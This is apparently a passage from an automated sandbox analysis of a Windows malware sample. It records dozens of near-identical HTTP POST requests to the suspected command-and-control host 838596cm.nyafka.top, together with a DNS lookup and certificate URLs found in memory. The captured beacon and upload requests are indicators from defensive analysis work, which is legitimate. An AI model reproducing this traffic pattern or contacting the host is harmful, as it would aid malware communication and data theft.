                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficDNS traffic detected: DNS query: 838596cm.nyafka.top
                                Source: unknownHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                Source: wxl1r0lntg.exe, 00000000.00000002.2052298255.00000000145C9000.00000004.00000800.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: wxl1r0lntg.exe, 00000000.00000002.2052298255.00000000145C9000.00000004.00000800.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: wxl1r0lntg.exe, 00000000.00000002.2052298255.00000000145C9000.00000004.00000800.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: wxl1r0lntg.exe, 00000000.00000002.2052298255.00000000145C9000.00000004.00000800.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
